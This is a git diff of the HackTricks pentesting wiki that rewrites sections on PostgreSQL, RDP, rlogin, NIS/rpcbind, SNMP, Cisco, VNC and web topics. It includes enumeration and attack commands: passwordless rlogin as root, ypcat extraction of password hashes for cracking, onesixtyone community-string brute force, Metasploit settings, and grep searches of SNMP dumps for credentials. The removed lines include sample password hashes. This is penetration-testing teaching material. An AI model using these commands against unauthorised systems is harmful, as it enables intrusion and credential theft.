+**PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\
 **You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.**
 
 {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %}
@@ -664,12 +664,9 @@ string pgadmin4.db
 
 ### pg\_hba
 
-Client authentication is controlled by a config file frequently named _**pg\_hba.conf**_. This file has a set of records. A record may have one of the following seven formats:
+Client authentication in PostgreSQL is managed through a configuration file called **pg_hba.conf**. This file contains a series of records, each specifying a connection type, client IP address range (if applicable), database name, user name, and the authentication method to use for matching connections. The first record that matches the connection type, client address, requested database, and user name is used for authentication. There is no fallback or backup if authentication fails. If no record matches, access is denied.
 
-![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL\_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu\_N1ztXJg)
-
-**Each** record **specifies** a **connection type**, a **client IP address range** (if relevant for the connection type), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.\
-The **password-based** authentication methods are **md5**, **crypt**, and **password**. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg\_authid.
+The available password-based authentication methods in pg_hba.conf are **md5**, **crypt**, and **password**. These methods differ in how the password is transmitted: MD5-hashed, crypt-encrypted, or clear-text. It's important to note that the crypt method cannot be used with passwords that have been encrypted in pg_authid.
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md
index 6b7f55911..a44436ba5 100644
--- a/network-services-pentesting/pentesting-rdp.md
+++ b/network-services-pentesting/pentesting-rdp.md
@@ -22,7 +22,7 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-**Remote Desktop** Protocol (**RDP**) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs **RDP** client software for this purpose, while the other computer must run **RDP** server software (from [here](https://en.wikipedia.org/wiki/Remote\_Desktop\_Protocol)).
+Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
 
 **Default port:** 3389
 
@@ -160,7 +160,7 @@ Entry_1:
   Name: Notes
   Description: Notes for RDP
   Note: |
-    Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software 
+    Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. 
 
     https://book.hacktricks.xyz/pentesting/pentesting-rdp
 
diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md
index b20667de7..469d7fff1 100644
--- a/network-services-pentesting/pentesting-rlogin.md
+++ b/network-services-pentesting/pentesting-rlogin.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-This service was mostly used in the old days for remote administration but now because of security issues this service has been replaced by the slogin and the ssh.
+In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections.
 
 **Default port:** 513
 
@@ -27,13 +27,14 @@ PORT    STATE SERVICE
 
 ## **Login**
 
-```
+```bash
+# Install client
 apt-get install rsh-client
 ```
 
-This command will try to **login** to the remote host by using the login name **root** (for this service **you don't need to know any password**):
+You can use the following command to try to **login** to a remote host where **no password** is required for access. Try using **root** is as username:
 
-```
+```bash
 rlogin <IP> -l <username>
 ```
 
diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md
index 441cd64ee..7946bc005 100644
--- a/network-services-pentesting/pentesting-rpcbind.md
+++ b/network-services-pentesting/pentesting-rpcbind.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
+**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.
 
 **Default port:** 111/TCP/UDP, 32771 in Oracle Solaris
 
@@ -50,27 +50,26 @@ Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more ab
 
 ## NIS
 
-If you find the service `ypbind`running:
+Exploring **NIS** vulnerabilities involves a two-step process, starting with the identification of the service `ypbind`. The cornerstone of this exploration is uncovering the **NIS domain name**, without which progress is halted.
 
 ![](<../.gitbook/assets/image (233).png>)
 
-You can try to exploit it. Anyway, first of all you will **need to guess the NIS "domain name"** of the machine (when NIS is installed it's configured a "domain name") and **without knowing this domain name you cannot do anything**.
 
-Upon obtaining the NIS domain name for the environment (example.org in this case), use the ypwhich command to ping the NIS server and ypcat to obtain sensitive material. You should feed encrypted password hashes into John the Ripper, and once cracked, you can use it to evaluate system access and privileges.
+The exploration journey begins with the installation of necessary packages (`apt-get install nis`). The subsequent step requires using `ypwhich` to confirm the NIS server's presence by pinging it with the domain name and server IP, ensuring these elements are anonymized for security.
+
+The final and crucial step involves the `ypcat` command to extract sensitive data, particularly encrypted user passwords. These hashes, once cracked using tools like **John the Ripper**, reveal insights into system access and privileges.
 
 ```bash
-root@kali:~# apt-get install nis
-root@kali:~# ypwhich -d example.org 192.168.10.1
-potatohead.example.org
-root@kali:~# ypcat –d example.org –h 192.168.10.1 passwd.byname
-tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash 
-katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash 
-james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh 
-florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh 
-dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash 
-yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
+# Install NIS tools
+apt-get install nis
+# Ping the NIS server to confirm its presence
+ypwhich -d <domain-name> <server-ip>
+# Extract user credentials
+ypcat –d <domain-name> –h <server-ip> passwd.byname
 ```
 
+### NIF files
+
 | **Master file**  | **Map(s)**                  | **Notes**                         |
 | ---------------- | --------------------------- | --------------------------------- |
 | /etc/hosts       | hosts.byname, hosts.byaddr  | Contains hostnames and IP details |
@@ -88,9 +87,8 @@ You could enumerate users of the box. To learn how read [1026 - Pentesting Rsuse
 
 ## Bypass Filtered Portmapper port
 
-If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\
-But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\
-More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
+When conducting a **nmap scan** and discovering open NFS ports with port 111 being filtered, direct exploitation of these ports is not feasible. However, by **simulating a portmapper service locally and creating a tunnel from your machine** to the target, exploitation becomes possible using standard tools. This technique allows for bypassing the filtered state of port 111, thus enabling access to NFS services. For detailed guidance on this method, refer to the article available at [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
+
 
 ## Shodan
 
@@ -111,7 +109,7 @@ Entry_1:
   Name: Notes
   Description: Notes for PortMapper
   Note: |
-    Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
+    Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
 
     https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
 
diff --git a/network-services-pentesting/pentesting-rsh.md b/network-services-pentesting/pentesting-rsh.md
index 038a633fd..4cfd5dc76 100644
--- a/network-services-pentesting/pentesting-rsh.md
+++ b/network-services-pentesting/pentesting-rsh.md
@@ -34,7 +34,7 @@ rsh domain\\user@<IP> <Command>
 ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsh)
 
 ## References
-* [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)]
+* [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
index 16c68395c..153a7e666 100644
--- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
+++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@@ -22,14 +22,15 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ### **What is a RID**
 
-A [Relative Identifier (RID)](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) is a **unique identifier** (represented in hexadecimal format) utilized by Windows to **track and identify objects**. To explain how this fits in, let's look at the examples below:
+### Overview of Relative Identifiers (RID) and Security Identifiers (SID)
 
-* The [SID](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) for the NAME\_DOMAIN.LOCAL domain is: `S-1-5-21-1038751438-1834703946-36937684957`.
-* When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object.
-* So the domain user `john` with a RID:\[0x457] Hex 0x457 would = decimal `1111`, will have a full user SID of: `S-1-5-21-1038751438-1834703946-36937684957-1111`.
-* This is unique to the `john` object in the NAME\_DOMAIN.LOCAL domain and you will never see this paired value tied to another object in this domain or any other.
+**Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain. 
+
+- **SIDs** serve as unique identifiers for domains, ensuring that each domain is distinguishable.
+- **RIDs** are appended to SIDs to create unique identifiers for objects within those domains. This combination allows for precise tracking and management of object permissions and access controls.
+
+For instance, a user named `pepe` might have a unique identifier combining the domain's SID with his specific RID, represented in both hexadecimal (`0x457`) and decimal (`1111`) formats. This results in a complete and unique identifier for pepe within the domain like: `S-1-5-21-1074507654-1937615267-42093643874-1111`.
 
-Definition from [**here**](https://academy.hackthebox.com/module/143/section/1269).
 
 ### **Enumeration with rpcclient**
 
diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md
index 4c3375e72..99f23ddc1 100644
--- a/network-services-pentesting/pentesting-snmp/README.md
+++ b/network-services-pentesting/pentesting-snmp/README.md
@@ -39,8 +39,11 @@ MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCI
 
 ### OIDs
 
-**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
-**Vendors define private branches including managed objects for their own products.**
+**Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**.
+
+The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established.
+
+Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards.
 
 ![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
 
@@ -49,6 +52,8 @@ There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid
 
 ### **OID Example**
 
+[**Example from here**](https://www.netadmintools.com/snmp-mib-and-oids/):
+
 **`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
 
 Here is a breakdown of this address.
@@ -78,8 +83,6 @@ The rest of the values give specific information about the device.
 * 4 – point number
 * 7 – state of the point
 
-_**(Example take from**_ [_**here**_](https://www.netadmintools.com/snmp-mib-and-oids)_**)**_
-
 ### SNMP Versions
 
 There are 2 important versions of SNMP:
@@ -102,6 +105,8 @@ In versions 1 and 2/2c if you to use a **bad** community string the server wont
 
 ## Ports
 
+[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#:~:text=All%20SNMP%20messages%20are%20transported,port%20161%20in%20the%20agent.):
+
 * The SNMP agent receives requests on UDP port **161**.
 * The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**.
 * When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**.
@@ -151,25 +156,31 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 
 ### **Dangerous Settings**
 
-**From** [**https://academy.hackthebox.com/module/112/section/1075**](https://academy.hackthebox.com/module/112/section/1075)\*\*\*\*
+In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control. 
 
-| **Settings**                                     | **Description**                                                                       |
-| ------------------------------------------------ | ------------------------------------------------------------------------------------- |
-| `rwuser noauth`                                  | Provides access to the full OID tree without authentication.                          |
-| `rwcommunity <community string> <IPv4 address>`  | Provides access to the full OID tree regardless of where the requests were sent from. |
-| `rwcommunity6 <community string> <IPv6 address>` | Same access as with `rwcommunity` with the difference of using IPv6.                  |
+### Access Settings
 
-### Microsoft Windows SNMP parameters
+Two main settings enable access to the **full OID tree**, which is a crucial component in network management:
 
-| **MIB Value**                                    | **Description**                                                                       |
-| ------------------------------------------------ | ------------------------------------------------------------------------------------- |
-| `1.3.6.1.2.1.25.1.6.0`                           | System Processes.                                                                     |
-| `1.3.6.1.2.1.25.4.2.1.2`                         | Running Programs.                                                                     |
-| `1.3.6.1.2.1.25.4.2.1.4`                         | Processes Path.                                                                       |
-| `1.3.6.1.2.1.25.2.3.1.4`                         | Storage Units.                                                                        |
-| `1.3.6.1.2.1.25.6.3.1.2`                         | Software Name.                                                                        |
-| `1.3.6.1.4.1.77.1.2.25`                          | User Accounts.                                                                        |
-| `1.3.6.1.2.1.6.13.1.3`                           | TCP Local Ports.                                                                      |
+1. **`rwuser noauth`** is set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access.
+
+2. For more specific control, access can be granted using:
+    - **`rwcommunity`** for **IPv4** addresses, and
+    - **`rwcommunity6`** for **IPv6** addresses.
+    
+Both commands require a **community string** and the relevant IP address, offering full access irrespective of the request's origin.
+
+### SNMP Parameters for Microsoft Windows
+
+A series of **Management Information Base (MIB) values** are utilized to monitor various aspects of a Windows system through SNMP:
+
+- **System Processes**: Accessed via `1.3.6.1.2.1.25.1.6.0`, this parameter allows for the monitoring of active processes within the system.
+- **Running Programs**: The `1.3.6.1.2.1.25.4.2.1.2` value is designated for tracking currently running programs.
+- **Processes Path**: To determine where a process is running from, the `1.3.6.1.2.1.25.4.2.1.4` MIB value is used.
+- **Storage Units**: The monitoring of storage units is facilitated by `1.3.6.1.2.1.25.2.3.1.4`.
+- **Software Name**: To identify the software installed on a system, `1.3.6.1.2.1.25.6.3.1.2` is employed.
+- **User Accounts**: The `1.3.6.1.4.1.77.1.2.25` value allows for the tracking of user accounts.
+- **TCP Local Ports**: Finally, `1.3.6.1.2.1.6.13.1.3` is designated for monitoring TCP local ports, providing insight into active network connections.
 
 ### Cisco
 
@@ -195,44 +206,50 @@ Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like
 
 **Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]
 
-```
+```bash
 braa ignite123@192.168.1.125:.1.3.6.*
 ```
 
 This can extract a lot MB of information that you cannot process manually.
 
+
 So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
 
-### Devices
 
-One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:
+### **Devices**
 
-```
+The process begins with the extraction of **sysDesc MIB data** (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a **grep command**:
+
+
+```bash
 grep ".1.3.6.1.2.1.1.1.0" *.snmp
 ```
 
-### Identify private string
+### **Identify Private String**
 
-As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:
+A crucial step involves identifying the **private community string** used by organizations, particularly on Cisco IOS routers. This string enables the extraction of **running configurations** from routers. The identification often relies on analyzing SNMP Trap data for the word "trap" with a **grep command**:
 
 ```bash
 grep -i "trap" *.snmp
 ```
 
-### Usernames/passwords
+### **Usernames/Passwords**
 
-Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as _fail_, _failed_ or _login_ and examine that data to see if there is anything of value.
+Logs stored within MIB tables are examined for **failed logon attempts**, which might accidentally include passwords entered as usernames. Keywords such as _fail_, _failed_, or _login_ are searched to find valuable data:
 
 ```bash
 grep -i "login\|fail" *.snmp
 ```
 
-### Emails
+### **Emails**
+
+Finally, to extract **email addresses** from the data, a **grep command** with a regular expression is used, focusing on patterns that match email formats:
 
 ```bash
 grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
 ```
 
+
 ## Modifying SNMP values
 
 You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so.
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index 8d5967dd9..eca5fc69c 100644
--- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -14,34 +14,28 @@
 
 # Pentesting Cisco Networks
 
-SNMP is a protocol used for monitoring the status of devices on a computer network. It operates on the UDP transport layer protocol with port numbers 161/UDP and 162/UDP.
+**SNMP** functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as passwords that enable communication between SNMP agents and servers. These strings are pivotal for they determine access levels, specifically **read-only (RO) or read-write (RW) permissions**. A notable attack vector for pentesters is the **brute-forcing of community strings**, aiming to infiltrate network devices.
 
-SNMP employs community strings, which act as passwords for communication between SNMP agents and servers. These community strings grant either **read-only (RO) or read-write (RW) permissions**. Pentesters can exploit SNMP by **brute-forcing the community strings** to gain access to network equipment.
-
-To perform a brute-force attack on community strings it's possible to use **[onesixtyone](https://github.com/trailofbits/onesixtyone)**. This tool requires a dictionary for brute-forcing and the IP addresses of the target hosts:
+A practical tool for executing such brute-force attacks is **[onesixtyone](https://github.com/trailofbits/onesixtyone)**, which necessitates a list of potential community strings and the IP addresses of the targets:
 
 ```bash
 onesixtyone -c communitystrings -i targets
 ```
 
-If the **community strings are discovered**, further exploitation becomes possible.
-
 ### `cisco_config_tftp`
 
-Using the `cisco_config_tftp` module in the Metasploit framework, the **device configuration** can be pulled by knowing the value of the community string. The community string with **read-write (RW) permissions is required**.
+The Metasploit framework features the `cisco_config_tftp` module, facilitating the extraction of device configurations, contingent upon acquiring an RW community string. Essential parameters for this operation include:
 
-The following parameters are needed:
+- RW community string (**COMMUNITY**)
+- Attacker's IP (**LHOST**)
+- Target device's IP (**RHOSTS**)
+- Destination path for the configuration files (**OUTPUTDIR**)
 
-- RW community string (COMMUNITY)
-- Attacker's IP address (LHOST)
-- Target equipment IP address (RHOSTS)
-- Path for the output directory of the device configuration (OUTPUTDIR)
-
-After configuring the module, the exploit can be initiated. The host configuration with the specified IP address will be downloaded to the designated folder.
+Upon configuration, this module enables the download of device settings directly to a specified folder.
 
 ### `snmp_enum`
 
-The **`snmp_enum` module in the Metasploit framework allows for the retrieval of information about the target hardware**. Similar to the previous module, the COMMUNITY parameter (even a string with read-only permissions) and the IP address of the target device are required:
+Another Metasploit module, **`snmp_enum`**, specializes in gathering detailed hardware information. It operates with either type of community string and requires the target's IP address for successful execution:
 
 ```bash
 msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
diff --git a/network-services-pentesting/pentesting-vnc.md b/network-services-pentesting/pentesting-vnc.md
index 08b00e14a..6bf184ec6 100644
--- a/network-services-pentesting/pentesting-vnc.md
+++ b/network-services-pentesting/pentesting-vnc.md
@@ -16,8 +16,7 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\
-From [wikipedia](https://en.wikipedia.org/wiki/Virtual\_Network\_Computing).
+**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remote assistance or collaboration over a network.
 
 VNC usually uses ports **5800 or 5801 or 5900 or 5901.**
 
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md
index ef48dead3..dc5f08f4a 100644
--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@@ -353,7 +353,11 @@ Now that a comprehensive enumeration of the web application has been performed i
 [web-vulnerabilities-methodology](../../pentesting-web/web-vulnerabilities-methodology/)
 {% endcontent-ref %}
 
-TODO: Complete the list of vulnerabilities and techniques with [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) and [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html), [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
+Find more info about web vulns in:
+
+* [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
+* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html)
+* [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
 
 ### Monitor Pages for changes
 
diff --git a/network-services-pentesting/pentesting-web/angular.md b/network-services-pentesting/pentesting-web/angular.md
index 1112f886b..c22868275 100644
--- a/network-services-pentesting/pentesting-web/angular.md
+++ b/network-services-pentesting/pentesting-web/angular.md
@@ -2,7 +2,7 @@
 
 ## The Checklist
 
-Verify that:
+Checklist [from here](https://lsgeurope.com/post/angular-security-checklist).
 
 * [ ] Angular is considered a client-side framework and is not expected to provide server-side protection
 * [ ] Sourcemap for scripts is disabled in the project configuration
@@ -14,9 +14,7 @@ Verify that:
 
 ## What is Angular
 
-Angular is a powerful front-end framework that is widely used for building dynamic web applications. It is open-source and maintained by Google. One of the key features of Angular is its use of TypeScript, a typed superset of JavaScript that makes code easier to read, maintain, and debug.
-
-Angular's security mechanisms are designed to prevent common client-side vulnerabilities, including cross-site scripting (XSS) and open redirects. However, Angular can also be used on the server-side to generate static pages. Thus, the security of Angular should be considered from both sides.
+Angular is a **powerful** and **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to enhance code readability and debugging. With strong security mechanisms, Angular prevents common client-side vulnerabilities like **XSS** and **open redirects**. It can be used on the **server-side** too, making security considerations important from **both angles**.
 
 ## Framework architecture
 
diff --git a/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
index 65ad99b29..311c9cdc0 100644
--- a/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -27,7 +27,7 @@ Learn more about Firebase in:
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/cgi.md b/network-services-pentesting/pentesting-web/cgi.md
index f0e9cc4a1..9b95b761c 100644
--- a/network-services-pentesting/pentesting-web/cgi.md
+++ b/network-services-pentesting/pentesting-web/cgi.md
@@ -22,7 +22,7 @@ In order to test for **CGI vulns** it's recommended to use `nikto -C all` \(and
 
 # **ShellShock**
 
-Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an **attacker can tack-on malicious code to the environment variable, which will run once the variable is received**.
+**ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system.
 
 Exploiting this vulnerability the **page could throw an error**.
 
diff --git a/network-services-pentesting/pentesting-web/code-review-tools.md b/network-services-pentesting/pentesting-web/code-review-tools.md
index f307ab68b..5f9460a50 100644
--- a/network-services-pentesting/pentesting-web/code-review-tools.md
+++ b/network-services-pentesting/pentesting-web/code-review-tools.md
@@ -451,52 +451,6 @@ https://github.com/securego/gosec
    * Finally, paste the deobfuscated output into https://prettier.io/playground/ to beautify it for analysis.
    * **Note**: If you are still seeing packed (but different) js, it may be recursively packed. Repeat the process.
 
